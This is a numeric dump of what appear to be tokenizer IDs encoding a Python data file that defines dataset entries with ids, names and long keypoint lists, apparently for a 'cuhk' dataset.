705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
807,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
83,
7596,
364,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
860,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
8135,
2265,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
838,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
19509,
62,
82,
7197,
1079,
62,
49380,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
1367,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
6511,
62,
82,
7197,
1079,
62,
49380,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
